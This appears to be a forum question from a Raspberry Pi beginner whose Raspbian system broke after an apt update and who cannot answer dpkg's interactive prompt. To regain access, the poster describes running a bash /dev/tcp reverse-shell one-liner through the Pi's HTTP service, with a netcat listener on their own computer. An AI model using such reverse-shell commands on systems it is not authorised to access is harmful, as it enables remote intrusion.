# I can't configure the libc6:armhf

Tags: raspberry-pi, glibc, apt

I use a raspberry pi. I am a full newbie on raspberry pi and I decided to start learning. However, after an `apt update`, the system is over. It's a Raspbian GNU/Linux 9.4 (stretch).

There is no longer ssh but there is a HTTP service running. So I enter this command `bash -i >& /dev/tcp/$MY_IP_ADDRESS/4444 0>&1` on the raspberry pi HTTP server and `nc -l 4444` on my computer in order to have a shell on this system.

I had to fix a ton of bugs in order to be able to run `apt --fix-broken install`, **It's been a week I am on it.**

However, I am now able to run the command but the fact is that I am stuck on this picture

[image: I want to throw my raspberry pi on the street !]

I literally can't enter yes or no. I mean, when I type , I go to the next line and I type letter.

Does anyone has any ideas ?

PS : `yes | dpkg --configure -a` does not work.